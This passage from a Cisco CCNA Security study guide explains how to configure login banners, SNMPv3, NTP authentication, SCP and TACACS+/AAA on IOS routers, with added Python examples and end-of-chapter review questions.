This banner appears after successful authentication but before the first command prompt appears. To configure the EXEC banner to say "This is your last chance to leave if you are unauthorized," use this command:

R85(config)# banner exec '
Enter TEXT message.  End with the character '''.
This is your last chance to leave if you are unauthorized.'

Login Banner

This banner appears after the MOTD banner (if configured), before the login prompt, and before the EXEC banner (if configured). To configure the login banner to say "This is your first chance to leave if you are unauthorized," use this command:

R85(config)# banner login '
Enter TEXT message.  End with the character '''.
This is your first chance to leave if you are unauthorized.'

Verification

To check your work, let's connect from R86 using Telnet and see what you get:

R86# telnet 10.10.10.10
Trying 10.10.10.10 ... Open
We will be down for 2 hours at 12 PM
This is your first chance to leave if you are unauthorized
Username: Admin
Password: <hidden>
This is your last chance to leave if you are unauthorized

As you can see, you received the messages as configured, in the order you expected.
Securing Access through SNMPv3

Configuring SNMP requires you to set an engine ID for any device used to manage SNMP. This is an ID number composed of 24 hex characters. When inform messages are sent to stations, it is the engine ID that identifies the station. It is entered as a 12-character string. Setting the SNMPv3 engine ID for the management station on a router is done as follows:

R82(config)# snmp-server engineID local 000010000203

Once the engine ID has been defined, the high-level steps to control access to SNMP are as follows:

1. Define an SNMP group and specify the cryptographic policy to be used by the group. In this same command, you can assign an MIB view.
2. Define SNMP users and assign them a user group, a view, an authentication hashing algorithm and shared secret, and, when used, an encryption algorithm.
3. Define SNMP views, each of which will control the information that can be accessed by users who have been assigned the view.
4. Define the SNMP host that will be the recipient of traps. You will also specify in the same command the user account (and the algorithms and keys associated with that account) under whose security context the traps will be sent.

First, let's define an SNMP group named snmp-group, specify version 3, and set it to use the priv security policy and to have read-only access to the view named read-view (to be created in a later step).

R82(config)# snmp-server group snmp-group v3 priv read read-view

Next, let's define an SNMP user named read-user, assign the user to the group snmp-group, set the version as version 3, configure SHA as the authentication algorithm using a shared key of troy-key, and configure 128-bit AES as the encryption algorithm using mac-key as the shared key for AES.

R82(config)# snmp-server user read-user snmp-group v3 auth sha troy-key priv aes 128 mac-key

Now let's define the view that you referenced in the command creating the group. The view will only allow read access to the OID 1.3.6.1.2.1 and below.

R82(config)# snmp-server view read-view 1.3.6.1.2.1 included

Finally, let's set the IP address of the management station to which any traps should be sent, along with the version number, a cryptographic policy of priv, and a user account named test-user under whose security context the traps will be sent. This is an account you did not create in this example.

R82(config)# snmp-server host 10.10.10.10 version 3 priv test-user
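The view in step 3 is the part of this configuration that decides which OIDs a user can actually reach, and the MIB discussion earlier in the chapter explains why: an OID is a path through the tree, and a view is a list of subtrees marked included or excluded. The Python code below is an added example, not Cisco's implementation; it parses view commands in the CLI form used above and answers the question the agent has to answer before serving a get or set: is this OID visible through this view? IOS lets a view carry several entries, so the example goes a step beyond the single-entry read-view in the text by adding a constructed `excluded` entry for the interfaces subtree (1.3.6.1.2.1.2, a standard mib-2 OID) and resolving conflicts by the longest matching subtree.

```python
def parse_oid(text):
    """'1.3.6.1.2.1' -> (1, 3, 6, 1, 2, 1)"""
    return tuple(int(part) for part in text.split("."))


def parse_view_commands(commands):
    """Parse 'snmp-server view NAME OID included|excluded' lines
    into {name: [(subtree_tuple, 'included'|'excluded'), ...]}."""
    views = {}
    for cmd in commands:
        parts = cmd.split()
        if parts[:2] != ["snmp-server", "view"] or len(parts) != 5:
            raise ValueError(f"not a view command: {cmd}")
        name, subtree, vtype = parts[2], parts[3], parts[4]
        if vtype not in ("included", "excluded"):
            raise ValueError(f"bad view type in: {cmd}")
        views.setdefault(name, []).append((parse_oid(subtree), vtype))
    return views


def is_visible(view, oid):
    """True if the most specific (longest) subtree covering oid is 'included'.
    An OID covered by no subtree at all is outside the view."""
    target = parse_oid(oid)
    best = None
    for subtree, vtype in view:
        covers = target[:len(subtree)] == subtree
        if covers and (best is None or len(subtree) > len(best[0])):
            best = (subtree, vtype)
    return best is not None and best[1] == "included"


# read-view as configured in the text, plus one constructed exclusion.
VIEWS = parse_view_commands([
    "snmp-server view read-view 1.3.6.1.2.1 included",
    "snmp-server view read-view 1.3.6.1.2.1.2 excluded",
])

# Constructed requests from a user whose group references read-view.
SAMPLE_REQUESTS = {
    "1.3.6.1.2.1.1.5.0": True,       # sysName: inside mib-2, served
    "1.3.6.1.2.1.2.2.1.1.1": False,  # ifIndex: under the excluded interfaces subtree
    "1.3.6.1.4.1.9.1": False,        # Cisco private branch: outside the view entirely
}


def check_requests():
    """Evaluate every constructed request against read-view."""
    return {oid: is_visible(VIEWS["read-view"], oid) for oid in SAMPLE_REQUESTS}
```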
Securing NTP

Synchronization of time among infrastructure devices has become more and more critical to the proper operation of networks. Digital certificates have explicit validity periods, certain Windows operations require strict time synchronization, and analysis of integrated log files becomes a nightmare when the devices from which the log files come have not been synchronized. Moreover, some compliance standards call for strict time synchronization.

While the need to use NTP is without question, network attacks leveraging NTP have appeared that now require you to secure the operation of NTP to prevent such attacks. These attacks can be prevented by configuring NTP authentication. This involves setting a shared secret between the NTP clients and the NTP server that will be used to compute a hash value of the update sent to the client. The client will perform a hash calculation of the update using the same shared key and will compare the results. A match serves as assurance that the update came from the legitimate NTP server. It is important to note that this does not encrypt the update; it only verifies its origin and trustworthiness. Figure 8.2 shows the process.

FIGURE 8.2 NTP authentication process

To configure NTP authentication, the high-level steps (to be performed on both server and client) are as follows:

1. Configure an NTP authentication key number and MD5 string (shared secret).
2. Specify at least one trusted key number referencing the key number in step 1.
3. Enable NTP authentication.

For the first step, let's configure an NTP key numbered 87 with an associated MD5 string (the shared secret) of mykey on two routers.

R88(config)# ntp authentication-key 87 md5 mykey
R89(config)# ntp authentication-key 87 md5 mykey

Now let's specify the use of key number 87 and its associated MD5 string to be used for NTP authentication.

R88(config)# ntp trusted-key 87
R89(config)# ntp trusted-key 87

Finally, all you need to do is enable NTP authentication.

R88(config)# ntp authenticate
R89(config)# ntp authenticate
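What the three commands set up on the wire is the NTP symmetric-key MAC described in RFC 5905: the server appends the key ID and an MD5 digest computed over the shared secret followed by the packet, and the client recomputes the digest with the same key and compares. The Python code below is an added example, not taken from the book or from any NTP implementation; it builds a constructed 48-byte NTPv4 server reply, signs it as the server would, and verifies it as the client would, using key 87 and the secret mykey from the configuration above. It also shows the two caveats a practitioner wants confirmed: a tampered timestamp fails verification, and the packet itself is not encrypted, only authenticated.

```python
import hashlib
import hmac
import struct

# Shared-secret table on both routers: mirrors
# 'ntp authentication-key 87 md5 mykey' and 'ntp trusted-key 87'.
KEYS = {87: b"mykey"}
TRUSTED_KEYS = {87}

MAC_LEN = 4 + 16        # key ID + MD5 digest
HEADER_LEN = 48


def build_header(stratum=2, tx_seconds=3_900_000_000):
    """Constructed NTPv4 server reply header (LI=0, VN=4, Mode=4 server)."""
    li_vn_mode = (0 << 6) | (4 << 3) | 4
    poll, precision = 6, -20
    root_delay = root_dispersion = 0
    reference_id = b"GPS\x00"
    # Reference, origin, receive, transmit timestamps (seconds, fraction); fractions zero.
    timestamps = struct.pack("!IIIIIIII",
                             tx_seconds - 10, 0, tx_seconds - 1, 0,
                             tx_seconds, 0, tx_seconds, 0)
    return (struct.pack("!BBbb", li_vn_mode, stratum, poll, precision)
            + struct.pack("!II", root_delay, root_dispersion)
            + reference_id + timestamps)


def sign(packet, key_id):
    """Server side: append key ID and MD5(key || packet) as the MAC."""
    digest = hashlib.md5(KEYS[key_id] + packet).digest()
    return packet + struct.pack("!I", key_id) + digest


def verify(message):
    """Client side with 'ntp authenticate' on: accept only a message whose MAC
    checks out under a key that is both configured and trusted."""
    if len(message) < HEADER_LEN + MAC_LEN:
        return False                       # no MAC: unauthenticated update, rejected
    packet, mac = message[:-MAC_LEN], message[-MAC_LEN:]
    key_id = struct.unpack("!I", mac[:4])[0]
    if key_id not in TRUSTED_KEYS or key_id not in KEYS:
        return False
    expected = hashlib.md5(KEYS[key_id] + packet).digest()
    return hmac.compare_digest(expected, mac[4:])


def demo():
    """(genuine update accepted, tampered update rejected, unsigned update rejected)."""
    genuine = sign(build_header(), 87)
    tampered = bytearray(genuine)
    tampered[40] ^= 0x01                   # flip one bit of the transmit timestamp
    return verify(genuine), verify(bytes(tampered)), verify(build_header())
```

Because the MAC covers the whole header, changing any field (here one bit of the transmit timestamp) invalidates it, which is the origin-and-integrity assurance the text describes. Note that `sign()` leaves the first 48 bytes of the message byte-for-byte identical to the unsigned header: NTP authentication adds integrity, not confidentiality.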
Using SCP for File Transfer

While FTP and TFTP can be used to transfer configurations and IOS images across the network, these protocols lack the ability to encrypt the transmission. A better alternative is Secure Copy Protocol (SCP). This is an implementation of the Remote Copy Protocol (RCP) that operates over an SSH connection. The server that is used to store images and configurations must be configured as an SCP server with a key that can be validated by the Cisco devices. That setup is beyond the scope of this book; however, we will cover the commands to be used on the Cisco devices to perform an SCP transfer.

With the server setup in place, you simply reference the SCP server by URL in the copy command. For example, if the server were named scp-srv and you wanted to copy the running configuration to it under the security context of an account named admin with a password of mypass, while naming the file r88-config.txt, you would use the following command (the IOS SCP URL form places the credentials before the host name):

R88# copy run scp://admin:mypass@scp-srv/r88-config.txt

To restore that file to the startup configuration, you would use the following command:

R88# copy scp://admin:mypass@scp-srv/r88-config.txt start
Summary

In this chapter, you learned about the security differences in managing devices from in-band and out-of-band interfaces. You also learned that in-band interfaces include HTTP, VTY, and the physical interfaces on the device and that out-of-band interfaces include the console and AUX ports. The chapter also discussed methods of securing management interfaces, including enabling the HTTPS server, securing SNMPv3 with a security policy, applying passwords to all management interfaces, and using SSH for remote management. Among the other topics covered in this chapter were the types of banner message that can be configured and the securing of the NTP protocol.

Exam Essentials

Identify in-band and out-of-band interfaces. In-band interfaces include HTTP, VTY, and the physical interfaces on the device. Out-of-band interfaces include the console and AUX ports.

Describe methods to secure management interfaces. These include disabling the HTTP server and enabling the HTTPS server, securing SNMPv3 with a security policy, applying passwords to all management interfaces, and using SSH for remote management rather than Telnet. It also includes applying ACLs to all management interfaces.

Identify the types of banner messages and their use. These include the message of the day banner, which appears when a connection is made; the login banner, which appears after the MOTD banner and before the login prompt; and the EXEC banner, which appears after authentication.

List the three security policies that can be applied to SNMPv3. These include noAuthNoPriv, which is no hashing to secure authentication or encryption of data; AuthNoPriv, which is hashing to secure authentication but no encryption of data; and AuthPriv, which is hashing to secure authentication and encryption of data.

Describe the steps to configure NTP authentication. These steps are configuring an NTP authentication key number and MD5 string (shared secret), specifying at least one trusted key number referencing the key number in the first step, and enabling NTP authentication.
Review Questions

1. Which of the following is an out-of-band connection?
A. HTTP
B. Con 0
C. Gi0/1
D. VTY
2. What information is required to set up a modem on the AUX port?
A. Line number
B. AUX password
C. Transmission rate
D. Modem model
3. Which of the following is a valid reason for configuring a loopback interface as the management interface?
A. It is more secure.
B. It provides better performance.
C. It is always up.
D. It is preconfigured.
4. What command enables you to identify the total number of VTY ports in the device?
A. R1(config)# line ?
B. R1(config)# line vty ?
C. R1# line ?
D. R1# line vty ?
5. How are the locations of information contained in SNMP identified?
A. MIB
B. OID
C. Informs
D. Traps
6. Which SNMP security policy provides hashing to secure authentication but no encryption of data?
A. noAuthNoPriv
B. AuthNoPriv
C. AuthPriv
D. Priv
7. Which interfaces should be protected by passwords?
A. VTY
B. Console
C. HTTPS
D. All of the above
8. Which of the following commands enables encryption of HTTP transfers?
A. R81(config)# ip https secure
B. R81(config)# ip https server
C. R81(config)# ip http secure-server
D. R81(config-line)# ip http secure-server
9. Which command applies ACL 99 at the group level, while referring to the group test-group using the priv security policy with write access to a view called write-view?
A. R84# snmp-server group test-group v3 priv write write-view access 99
B. R84(config)# snmp-server test-group v3 priv write write-view access 99
C. R84(config)# snmp-server group test-group v3 priv write-view access 99
D. R84(config)# snmp-server group test-group v3 priv write write-view access 99
10. Which of the following is not a recommendation for banner message wording?
A. Use of words such as Welcome should be encouraged.
B. If you plan to use AAA accounting records in any subsequent legal proceeding, you must inform intruders they are being audited.
C. You should always state the owner of the system so there will be no later defense that the intruder was unaware of the system owner.
D. To prevent any future defense that permission was implied, always state "authorized access only."
11. Which of the following is not a banner type?
A. MOTD
B. EXEC
C. Login
D. Maintenance
12. Which of the following banner messages appears at connection time?
A. MOTD
B. EXEC
C. Login
D. Maintenance
13. When SNMP inform messages are sent to stations, what value identifies the station?
A. Process ID
B. MAC address
C. Engine ID
D. Router ID
14. Which of the following steps in configuring SNMPv3 security is optional?
A. Define an SNMP group
B. Assign an MIB view
C. Specify the cryptographic policy to be used by the group
D. Define SNMP users and assign them a user group
15. What statement is false with regard to the following command? R82(config)# snmp-server view read-view 1.3.6.1.2.1 included
A. The view is named read-view.
B. read-view is the group name.
C. 1.3.6.1.2.1 is the OID.
D. This command defines a view.
16. How is MD5 used in NTP authentication?
A. Encrypts the data
B. Hashes the update
C. Hashes the password
D. Encrypts the shared secret
17. Which step is not part of configuring NTP authentication?
A. Configure an NTP authentication key number and MD5 string
B. Specify at least one trusted key number referencing the key number
C. Encrypt the key number
D. Enable NTP authentication
18. Which of the following should be used as a secure alternative to TFTP or FTP?
A. SCP
B. RTP
C. VTP
D. STP
19. When using SCP to copy files to an SCP server, how do you reference the SCP server in the copy command?
A. MAC address
B. IP address
C. URL
D. Port number
20. In what repository is SNMP data contained?
A. OID
B. MIB
C. Registry
D. Hardware register
Chapter 9
Understanding 802.1x and AAA

CISCO CCNA SECURITY EXAM OBJECTIVES COVERED IN THIS CHAPTER:

2.2 AAA concepts
  Describe RADIUS and TACACS+ technologies
  Configure administrative access on a Cisco router using TACACS+
  Verify connectivity on a Cisco router to a TACACS+ server
  Explain the integration of Active Directory with AAA
  Describe authentication and authorization using ACS and ISE
2.3 802.1x authentication
  Identify the functions of 802.1x components

While access to the network and to network resources can be controlled by performing user authentication at the point of entry into the network, this approach creates a larger and larger management headache as the number of network entry devices grows. In fact, creating and managing user accounts and user passwords across multiple wireless access points, RAS servers, and VPN servers becomes almost unworkable. The 802.1x standard was created to address this issue. In this chapter, you'll explore 802.1x and two closely related technologies that make it possible.

In this chapter, you will learn the following:

Understanding AAA 802.1x components
Using RADIUS and TACACS+ technologies
Configuring administrative access with TACACS+
Verifying router connectivity to TACACS+
Integrating Active Directory with AAA
Performing authentication and authorization using ACS and ISE
802.1x Components

The 802.1x standard defines a framework for centralized port-based authentication. It can be applied to both wireless and wired networks and uses three components.

Supplicant: The user or device requesting access to the network
Authenticator: The device through which the supplicant is attempting to access the network
Authentication server: The centralized device that performs authentication

The role of the authenticator can be performed by a wide variety of network access devices, including remote access servers (both dial-up and VPN), switches, and wireless access points. The role of the authentication server can be performed by a Remote Authentication Dial-in User Service (RADIUS) or Terminal Access Controller Access Control System + (TACACS+) server. The authenticator requests credentials from the supplicant and, upon receipt of those credentials, relays them to the authentication server, where they are validated. Upon successful verification, the authenticator is notified to open the port for the supplicant to allow network access.

Figure 9.1 illustrates this process.

FIGURE 9.1 802.1x

RADIUS and TACACS+ Technologies

While RADIUS and TACACS+ perform the same roles, they have different characteristics. These differences must be taken into consideration when choosing a method. Keep in mind also that while RADIUS is a standard, TACACS+ is Cisco proprietary. Table 9.1 compares them.

TABLE 9.1 RADIUS and TACACS+

RADIUS
  Transport protocol: UDP
  Confidentiality: Password only
  Authentication, authorization, and accounting: Combines the three processes
  Supported Layer 3 protocols: All but RAS, NetBIOS, or X.25
  Devices: No support for securing Cisco commands
  Traffic: Less

TACACS+
  Transport protocol: TCP
  Confidentiality: Entire body except TACACS+ header
  Authentication, authorization, and accounting: Separates the three processes
  Supported Layer 3 protocols: All
  Devices: Support for securing Cisco commands
  Traffic: More

Many consider enabling 802.1x authentication on all devices to be the best protection you can provide a network.
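The Confidentiality row of Table 9.1 is the difference most worth understanding when choosing a protocol, and it is easy to make concrete. RADIUS protects only the User-Password attribute (RFC 2865 section 5.2): the password is XORed, 16 bytes at a time, with MD5(shared secret || Request Authenticator), chained on the previous block, while the user name and every other attribute travel in the clear. TACACS+ obfuscates the whole packet body (RFC 8907 section 4.5) with a pad derived from MD5(session ID || key || version || sequence number), leaving only the 12-byte header readable. The Python code below is an added example written for this page, not code from the book, from Cisco, or from either RFC; it implements both operations and reports what a passive observer of each exchange could read. The shared secret, authenticator, session ID, and credentials are all constructed values. Both schemes are keyed MD5 streams rather than modern authenticated encryption, which is one reason management traffic of this kind is normally confined to a protected network.

```python
import hashlib


def radius_hide_password(password, secret, authenticator):
    """RFC 2865 5.2: pad to 16-byte blocks, XOR each with MD5(secret || previous block),
    where the first 'previous block' is the Request Authenticator."""
    padded = password + b"\x00" * (-len(password) % 16)
    hidden, prev = b"", authenticator
    for i in range(0, len(padded), 16):
        stream = hashlib.md5(secret + prev).digest()
        block = bytes(p ^ s for p, s in zip(padded[i:i + 16], stream))
        hidden += block
        prev = block                      # chaining is on the *hidden* block
    return hidden


def radius_reveal_password(hidden, secret, authenticator):
    """Server side of the same operation; the null padding is stripped."""
    clear, prev = b"", authenticator
    for i in range(0, len(hidden), 16):
        stream = hashlib.md5(secret + prev).digest()
        block = hidden[i:i + 16]
        clear += bytes(c ^ s for c, s in zip(block, stream))
        prev = block
    return clear.rstrip(b"\x00")


def tacacs_pad(session_id, key, version, seq_no, length):
    """RFC 8907 4.5 pseudo-pad: MD5_1 = MD5(sid||key||ver||seq),
    MD5_n = MD5(sid||key||ver||seq||MD5_n-1), concatenated and truncated."""
    prefix = session_id.to_bytes(4, "big") + key + bytes([version, seq_no])
    pad, last = b"", b""
    while len(pad) < length:
        last = hashlib.md5(prefix + last).digest()
        pad += last
    return pad[:length]


def tacacs_obfuscate(body, session_id, key, version=0xC0, seq_no=1):
    """XOR the body with the pad; applying the same call again restores it."""
    pad = tacacs_pad(session_id, key, version, seq_no, len(body))
    return bytes(b ^ p for b, p in zip(body, pad))


def observe_on_the_wire():
    """What a passive observer can read from each protocol. All values constructed."""
    secret = b"mysecretkey"
    authenticator = bytes(range(16))      # RADIUS Request Authenticator (random in practice)
    user, password = b"adminsr", b"srpass"

    # RADIUS Access-Request: User-Name in the clear, User-Password hidden.
    radius_packet = (b"User-Name=" + user + b"|User-Password="
                     + radius_hide_password(password, secret, authenticator))

    # TACACS+ authentication START body (action, priv_lvl, type, service, then
    # user and data fields as a flat byte string); the entire body is obfuscated.
    body = b"\x01\x00\x01\x01" + user + password
    session_id = 0x12345678
    tacacs_packet = tacacs_obfuscate(body, session_id, secret)

    return {
        "radius_username_readable": user in radius_packet,
        "radius_password_readable": password in radius_packet,
        "tacacs_username_readable": user in tacacs_packet,
        "tacacs_password_readable": password in tacacs_packet,
    }
```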
Configuring Administrative Access with TACACS+

Earlier you learned how to secure administrative access to a Cisco device using SSH over the VTY lines. You also learned how to control the activities of those with administrative access using privilege levels. Both operations can also be done using AAA services. As you now know, the usernames and passwords can be located on an AAA server rather than on the local device. Having said that, it is also possible to take advantage of these services while locating the usernames and passwords on the local device. Regarding controlling the activities of those with administrative access, using user accounts rather than privilege levels provides more accountability. In this section, you'll look at how using AAA services changes these configurations.

Local AAA Authentication and Accounting

Local AAA authentication and accounting is a form of AAA in which the user accounts are located on the device rather than on an AAA server. To use AAA services for any type of authentication, it must be enabled on the device. Including this step, the high-level steps to configure local AAA authentication and accounting are as follows:

1. Create user accounts with an assigned privilege level and password.
2. Enable AAA services.
3. Configure an authentication method that specifies local authentication.
4. Configure an authorization method for access to the CLI that specifies local authentication.

Let's begin by creating a user account named adminsr that has a privilege level of 7 with an encrypted (secret) password of srpass.

R89(config)# username adminsr privilege 7 secret srpass

Now let's enable AAA services on the router.

R89(config)# aaa new-model

To configure an authentication method that specifies local authentication on all lines (by adding the default keyword), use this command:

R89(config)# aaa authentication login default local

Finally, let's configure an authorization method that provides access to the CLI (by including the exec keyword) on all lines (by adding the default keyword).

R89(config)# aaa authorization exec default local

The configuration will apply to all lines except for Con 0. This gives you a fallback method to access the CLI if a misconfiguration of authorization locks you out.

SSH Using AAA

In Chapter 8, you learned how to configure SSH access on the VTY lines. When you did that, you created local accounts and passwords to authenticate those connecting with SSH. You also learned in Chapter 8 how to assign privilege levels to user accounts. If you use AAA authentication for SSH, then you can use AAA to authorize the assigned privilege level of the same account when authentication occurs. Later in this chapter, you will learn how to use a TACACS+ server as the authentication method. In this example, you will continue to use a local AAA database. To do this, complete the following tasks:

1. Enable AAA services.
2. Configure an authentication method that specifies local authentication.
3. Configure an authorization method for access to the CLI that specifies local authentication.

These commands are executed much the same as when you were setting up local AAA authentication and accounting in the previous section.

To enable AAA services on the router, use this command:

R89(config)# aaa new-model

To configure an authentication method that specifies local authentication on all lines (by adding the default keyword), use this command:

R89(config)# aaa authentication login default local

To configure an authorization method that provides access to the CLI (by including the exec keyword) on all lines (by adding the default keyword), use this command:

R89(config)# aaa authorization exec default local

Again, the configuration will apply to all lines except for Con 0. This gives you a fallback method to access the CLI if a misconfiguration of authorization locks you out.
Understanding Authentication and Authorization Using ACS and ISE

To fully realize the benefits of the 802.1x security solution, user accounts and the security policies surrounding those accounts should be in a centralized database available to all devices operating as authenticators. The device operating as the authentication server in the 802.1x framework is the AAA server.

Cisco offers two AAA servers that can fulfill the role of authentication server. The Cisco Secure Access Control Server (ACS) can operate either as a RADIUS server or as a TACACS+ server. The Cisco Identity Services Engine (ISE) supports only RADIUS at the time of this writing. However, it supports functionality not present in the Cisco ACS. Additional features include the following:

Profiling to determine the type of device from which a network access request originates and to apply a set of access policies specific to the profile attached to that device. This means a user might have multiple profiles, each attached to the various devices they use.
Posture assessment to verify the minimum security requirements of a device before allowing access. If issues arise, such as missing OS or security updates, the device may be either remediated or denied entry.
Centralized web access for guest access to the network.

Understanding the Integration of Active Directory with AAA

Both Cisco AAA offerings support the centralization of user accounts and credentials on the AAA server. However, in most cases, doing so would constitute a duplication of effort since this same information is already contained in a directory services server such as Microsoft Active Directory. Both Cisco ACS and Cisco ISE can consult other databases for information.

The ability of these two offerings to utilize an external enterprise user ID repository is a key feature. While some Cisco devices, such as the Cisco Adaptive Security Appliance (ASA), can communicate directly with LDAP repositories or Active Directory for authentication purposes, most do not. Therefore, the deployment of an AAA server serves as an important link between the authenticators in the 802.1x framework and the external enterprise directory service. In the next section, you'll learn how an authenticator might speak to an external enterprise database through the AAA server, and you'll discover how to set up a Cisco router to use a TACACS+-based AAA server.

TACACS+ on IOS

While an AAA server can be populated with usernames and credentials, an AAA server can also utilize the same information that resides in an enterprise directory service such as Active Directory. When this is the case, the process that occurs during a request for network access is as follows. In this case, a TACACS+ server is in use.

1. The supplicant establishes a connection with the authenticator (router, WAP, VPN server).
2. The authenticator challenges the supplicant for credentials.
3. The supplicant responds with credentials.
4. The authenticator passes the credentials to the authentication server (AAA server).
5. The TACACS+ server consults the LDAP server.
6. The LDAP server performs authentication.
7. The authenticator passes the result to the supplicant.
Configuring a Router to Use a TACACS+ Server

The steps to configure a router to use a TACACS+ server are as follows:

1. Enable AAA authentication.
2. Specify the TACACS+ server name.
3. Specify the TACACS+ server IP address and type (IPv4 or IPv6).
4. Specify the key string used as a shared secret between the router and the TACACS+ server.
5. Specify the use of TACACS+ in the method list for authentication and authorization, while also specifying a backup method.
6. Create local usernames and credentials for use in case of loss of access to the TACACS+ server.
7. Enable per-command authorization (optional).
8. Enable accounting of administrative sessions and of the use of specific commands (optional).

First, let's enable AAA as you have done before.

R90(config)# aaa new-model

Next, name the TACACS+ server, specify its IPv4 address, and set the shared-secret key:

R90(config)# tacacs server servertac
R90(config-server-tacacs)# address ipv4 192.168.56.6
R90(config-server-tacacs)# key mysecretkey
R90(config-server-tacacs)# exit

Next, let's specify the use of TACACS+ in the method list for authentication and authorization, while also specifying a backup method. In this case, the backup is local authentication.

R90(config)# aaa authentication login default group tacacs+ local
R90(config)# aaa authorization exec default group tacacs+ local

As you are using local authentication as a backup, you need to create an account for that process should it be necessary. This process is the same as you learned earlier.

R90(config)# username adminsr privilege 7 secret srpass

Optionally, you can enable per-command authorization. In the following example, the router will consult the TACACS+ server whenever an administrator enters any privilege level 15 commands or any configuration commands. If the account lacks the authorization, it will be denied, and an error message will appear. Again, you have specified local as the backup method here.

R90(config)# aaa authorization commands 15 default group tacacs+ local
R90(config)# aaa authorization config-commands

Optionally, you can also enable accounting of administrative sessions and of the use of specific commands. In the following example, an accounting record will be sent at the start of an administrative session to the EXEC process, and another will be sent at the end of the session.

R90(config)# aaa accounting exec default start-stop group tacacs+

Finally (again optionally), the following command causes an accounting record to be sent for every privilege level 15 command and every configuration command:

R90(config)# aaa accounting commands 15 default stop-only group tacacs+
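The way IOS walks a method list such as `group tacacs+ local` is the detail that makes the backup account in step 6 safe to have: the router moves to the next method only when the current one returns an error (for example, the server does not answer), never when the method answers and rejects the credentials. A reachable TACACS+ server therefore cannot be bypassed by guessing the local account, while an outage still leaves the local database as a way in. The Python code below is an added example, not IOS code; it simulates a TACACS+ server and the local database with constructed accounts (the local one mirrors the `username adminsr` command above) and shows the outcome of the four cases a practitioner should be able to predict.

```python
from enum import Enum


class Result(Enum):
    PASS = "pass"     # the method authenticated the user
    FAIL = "fail"     # the method answered and rejected the credentials
    ERROR = "error"   # the method could not answer (server unreachable)


def make_tacacs_method(server_users, reachable):
    """Simulated 'group tacacs+': ERROR when the server is down, PASS/FAIL otherwise."""
    def tacacs(user, password):
        if not reachable:
            return Result.ERROR
        return Result.PASS if server_users.get(user) == password else Result.FAIL
    return tacacs


def make_local_method(local_users):
    """Simulated 'local': the device's own username database, always reachable."""
    def local(user, password):
        return Result.PASS if local_users.get(user) == password else Result.FAIL
    return local


def run_method_list(methods, user, password):
    """Walk the list in order. Only ERROR advances to the next method; the first
    PASS or FAIL is final. Returns (result, name of the method that decided)."""
    for name, method in methods:
        result = method(user, password)
        if result is not Result.ERROR:
            return result, name
    return Result.ERROR, None      # every method errored: the login is refused


# Constructed databases. The local entry mirrors
# 'username adminsr privilege 7 secret srpass'.
TACACS_DB = {"alice": "alicepass"}
LOCAL_DB = {"adminsr": "srpass"}


def scenarios():
    """Outcome of 'aaa authentication login default group tacacs+ local' in four cases."""
    server_up = [("tacacs+", make_tacacs_method(TACACS_DB, reachable=True)),
                 ("local", make_local_method(LOCAL_DB))]
    server_down = [("tacacs+", make_tacacs_method(TACACS_DB, reachable=False)),
                   ("local", make_local_method(LOCAL_DB))]
    return {
        # Normal operation: the server authenticates its own user.
        "server_up_valid_user": run_method_list(server_up, "alice", "alicepass"),
        # Server up, local-only account: the server says FAIL and local is never tried.
        "server_up_local_account": run_method_list(server_up, "adminsr", "srpass"),
        # Server down: ERROR moves the router on to the local database.
        "server_down_local_account": run_method_list(server_down, "adminsr", "srpass"),
        # Server down and an unknown user: local answers FAIL, so still no access.
        "server_down_unknown_user": run_method_list(server_down, "mallory", "x"),
    }
```

The same walk applies to the `aaa authorization exec default group tacacs+ local` list, which is why the text recommends keeping a local account for use only when the server is unreachable.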
Verify Router Connectivity to TACACS+

Once you have configured the router with the IP address of the TACACS+ server, you should verify that you have connectivity between the devices. This can be done by using the test command to test an authentication using the TACACS+ server. For example, to test the username mytest with a password of mypass, use the following command (test aaa is a privileged EXEC command):

R99# test aaa group tacacs mytest mypass new-code
Sending password
User successfully authenticated

USER ATTRIBUTES

username             0   "mytest"
reply-message        0   "Password:"

As you can see, the authentication succeeded, which indicates that you have connectivity to the TACACS+ server.
Summary

In this chapter, you learned about the AAA service that can be provided by TACACS+ and RADIUS servers. You also looked at configuring administrative access to a router using TACACS+. You learned how AAA can be integrated with Active Directory. You looked at the Cisco implementations of a RADIUS server, including the Cisco Secure Access Control Server (ACS) and the Cisco Identity Services Engine (ISE). Finally, you learned about the functions of various 802.1x components.

Exam Essentials

Describe the RADIUS and TACACS+ technologies. Understand the benefits of these technologies, which include centralization of authentication and reduction of administrative overhead. Also identify the differences between these technologies, which include the ports used and the way in which they handle authentication, authorization, and accounting functions.

Configure and verify administrative access to a router using TACACS+. This includes enabling AAA services, specifying the TACACS+ server name, specifying the TACACS+ server IP address and type (IPv4 or IPv6), specifying the key string used as a shared secret between the router and the TACACS+ server, and specifying the use of TACACS+ in the method list for authentication and authorization, while also specifying a backup method.

Explain the integration of Active Directory with AAA. Describe how an Active Directory server can be used by an AAA server as a repository for usernames and credentials.

Identify Cisco implementations of AAA servers. These include the Cisco Secure Access Control Server (ACS), which can operate either as a RADIUS server or as a TACACS+ server. The Cisco Identity Services Engine (ISE) supports only RADIUS at the time of this writing. However, it supports functionality not present in the Cisco ACS.

Identify the functions of 802.1x components. These include the supplicant (the device requesting access), the authenticator (the network access device to which you are connecting), and the authentication server (AAA server).
Review Questions
1. Which of the following is an example of the authenticator in the 802.1x standard?
A. Wireless AP
B. TACACS+ server
C. User laptop
D. AAA server
2. Which of the following is true about TACACS+?
A. Encrypts only the password
B. Separates the three AAA processes
C. Uses UDP
D. Creates less traffic than RADIUS
3. Which of the following commands enables AAA services on a router?
A. aaa enable
B. aaa new-model
C. enable aaa
D. aaa authentication
4. What command configures an authentication method that specifies local authentication?
A. aaa authentication default local
B. aaa authentication login local default
C. aaa authentication login default local
D. aaa login default local
5. When configuring an authorization method that provides access to the CLI, to which line does the configuration not apply?
A. VTY 0
B. CON 0
C. AUX 0
D. VTY 1
6. Which of the following is a Cisco implementation of an AAA server?
A. SDM
B. ACS
C. PIX
D. ASA
7. Which device can communicate directly with LDAP repositories or Active Directory for authentication purposes?
A. SDM
B. VTP
C. PIX
D. ASA
8. Which of the following commands specifies the TACACS+ server for a router?
A. tacacs server servername
B. server servername
C. tacacs server ipaddress
D. server ipaddress
9. Which command tests the authentication process and verifies connectivity to the TACACS+ server?
A. test aaa group tacacs username password new-code
B. test aaa group tacacs password new-code
C. test aaa group tacacs username new-code password
D. test aaa group tacacs username password
10. Which of the following commands specifies the use of TACACS+ in a method list for authorization while also specifying a backup method?
A. aaa authorization default group tacacs+ local
B. aaa authorization exec default group tacacs+ local
C. aaa authorization exec default tacacs+ local
D. aaa authorization exec group tacacs+ local
11. Which of the following steps in configuring a router to use a TACACS+ server is optional?
